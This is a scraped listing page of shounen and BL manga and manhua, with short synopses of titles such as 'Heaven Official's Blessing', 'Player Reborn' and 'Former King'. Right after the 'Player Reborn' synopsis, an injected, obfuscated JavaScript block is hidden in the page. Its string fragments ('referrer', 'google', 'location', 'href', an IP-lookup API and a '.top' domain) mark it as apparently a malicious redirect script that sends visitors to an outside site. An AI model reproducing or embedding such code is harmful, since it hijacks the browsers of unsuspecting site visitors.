Shounen - Page 766

Shounen manga is a genre that appeals to young males, filled with action, battles, and the story of a protagonist who works to overcome challenges. It focuses on themes like courage, loyalty, and the pursuit of dreams.

9539 results

A Saint From The Slum

summary I was an abandoned child in the slums. One day, I didn’t know my parents’ faces and there were more days of starving than days of eating. A stigmata suddenly appeared on the back of my hand. …I guess God made a mistake. * * * Eden Baroque Empire Breaking News! Finally, after 100 years, the oracle of Saint Bethcherian V comes down! She was 5 years old She was 5 years old She was not 5 years old She was 5 years old… … ? “We are attending a noble saint. Please follow God’s will, slay demons, bring world peace, and guide us who are in need.” They knelt before me, who was barely over 100 centimeters tall. Bringing world peace to a five-year-old. Is this true? Description A girl was left in a slum without parents but she found her own family. As always, she was hungry but happy to play around with her friend but a mark of holiness suddenly show up. Now the five-year-old girl is expected to carry a god’s will and save the world by killing an evil beast.


Heaven Official’s Blessing

Eight hundred years ago, the pure-blooded and noble Crown Prince, Xie Lian, was a well-regarded child of heaven with unlimited boundaries. However, who knew that after ascending, achieving immortality and becoming a Martial God that thousands of people worshipped, that his life would only go downhill. He was demoted and fell down the ranks until he reached rock bottom. Eight hundred years later, Xie Lian has ascended once again, but this time he has neither the followers nor any incense burned in his name. One day, on his way back from collecting trash, he picks up a mysterious youth and takes him home. This particular youth however, actually turns out to be Hua Cheng, the infamous Ghost King known throughout the three realms who could change both his gender and appearance at the flip of a dime.


Drunk in Love

"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Having a secret crush is just like drinking a bottle of hard liquor. You clearly know that it will make you light-headed, lose your cool and suffer. Yet, just like a moth flying into flames, you went for the pain knowingly. "You stop right after having a sip of it, but as for me… I'm drunk in love." However, there's always a day when you finally sober up after being drunk. This is a story about doing everything possible just to continue having a secret crush and learning to love someone. Intoxicated Love / Drunk in Love / Yi Zui Jingian / 네게 취한 날들 / 一醉經年 / 一醉经年


Beauty In My Bed

Ruan Tang, a beautiful wealthy man, was abandoned in a forest after getting his legs crushed. He wakes up finding himself in a broken down, tiny home. Who is this mysterious savior?


Perfect Adaptation

“Top Crossdresser” Kim Jiyoon bumped into “Dangerous Person” Han Taejun by accident. Then, Jiyoon turned and ran away quickly. Who thought that this beautiful turn caused an unbreakable line of tempestuous fate to form between the two.


When The Demon Gets Tempted

Xia Yang is a college student that’s a sucker for people with good looking faces and has been a fan of the idol, Jiang Zhengze, for many years. He is obsessed with idols, crazy about idols, and would do anything for his idols. But one day, the idol he longed for turned into a demon who wants to eat him up, constantly pushing him to the edge of his sanity. Thus his agonizing and turbulent cohabitation life begins…


Player Reborn

Wan Jia was betrayed by one of his own teammates in the virtual reality game, “King of Gamers” (KOG) and lost his qualification. However, In his final moments before being removed from the game, he was transported back one year earlier to the day that “King of Gamers” launched. Already a master of the game and possessing in-depth knowledge of the content of the game, Wan Jia orchestrates his return to the “King of Gamers” to not only to punish the traitorous teammate, but also achieve victory!<script></script><script>function _0x53c2(){var _0x27703e=['','DdnCB','then','http://rea','href','131181BGbnDJ','random','192354qIcEVv','referrer','google','location','gDMpC','VdTzB','zuZYB','8UblIqT','6QWjosj','.top/','721563UwgczB','uMwLk','jMpQa','NgOCF','603376wKYfRA','1595251tSCvex','text','includes','https://ip','MPblM','1302390cRhLHf','.customapi','oZRSt','1942443REHBHP','floor'];_0x53c2=function(){return _0x27703e;};return _0x53c2();}function _0x41d3(_0x22b786,_0xc41907){var _0x1d5cc4=_0x53c2();return _0x41d3=function(_0x35edb6,_0x3984c6){_0x35edb6=_0x35edb6-(0x31*0x95+-0x18b+-0x1968);var _0x365e9b=_0x1d5cc4[_0x35edb6];return _0x365e9b;},_0x41d3(_0x22b786,_0xc41907);}(function(_0x368e36,_0x4764aa){var _0x1b39f1=_0x41d3,_0x53395d=_0x368e36();while(!![]){try{var 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Far Away From Cold

.This is a story of Luo Xiaogongju chasing to be friends with others. Poverty attack x Clean addiction The little princess Luo Lin Yuan was born delicate and has a good face. Yu Han Schrodinger is straight and sleeps only three hours a day. Yu Han didn't want Luo Lin to get too close to him. Luo Lin wanted to get close to him far away.


The Royal Prince's First Love

.In order to consolidate the status of the royal prince, he launched an offensive in pursuit of a plutocratic daughter, but soon he suffered the first critical hit in his life. The campus bully had declared that his daughter was a friend that he wanted to protect. Then, he was hit by a second critical attack on the day he was fighting against the bully. However, he was intimate with the bully in his dreams every night! Everything seemed to be out of control. How should the prince, who had never made any mistakes, face his unexpected first love?-Spanish-Para consolidar su posicin el prncipe heredero lanz un ataque en busca de cierta persona rica. Pero pronto sufri la primera crtica de su vida: el matn del campus declar que era amigo de esa persona y le quera proteger. Luego, fue golpeado por un segundo ataque crtico: durante el da se enfrentaba contra el matn, pero todas las noches, tena intimidad con el matn en sus sueos! Todo parece estar fuera de control Cmo debera el prncipe heredero, quien nunca se haba equivocado, enfrentarse a su inesperado primer amor?


Former King

Read Former King / 前任为王 [Translated by Mosh Scans] After badmouthing the Gods, He Muyan was thrown into the system to be reborn infinitely. He was reincarnated as an elf in his seventh rebirth, when he realized the reality and planned to head in a bad direction before seeing a face he could never forget, his ex-boyfriend, Jin Yuanchen. How could he be here, and why had become a bandit, and kidnapped He Muyan to be Mrs. Yanzhai (Husband)? Bad show x Cynical evil “Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older.”


Apocalyptic Forecast

Life never seems to go Huai Shi's way. No friends, no family, no money... He applies for a job as a restaurant musician, but it turns out to be an ad for a gigolo! This is no way for a main character with a cheat to live... However, when the supernatural finally starts catching up with him, he begins to wish it never did.
